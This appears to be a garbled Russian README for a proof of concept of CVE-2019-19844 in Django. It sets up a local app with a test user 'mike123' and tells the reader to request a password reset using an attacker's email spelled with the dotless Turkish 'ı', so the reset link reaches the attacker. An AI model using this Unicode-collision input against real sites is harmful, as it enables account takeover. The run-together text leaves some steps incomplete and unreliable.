
PoC для CVE-2019-19844(https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
PoC для CVE-2019-19844
django_cve_2019_19844_poc)DJANGO_DATABASE_NAME (например, export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)pip install -r requirements.txt && ./manage.py migrate --noinputshell:>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', '[email protected]', 'test123')
./manage.py runserverhttp://127.0.0.1:8000/accounts/password-reset/mı[email protected] (email атакующего) и нажмите кнопку «Отправить»mike123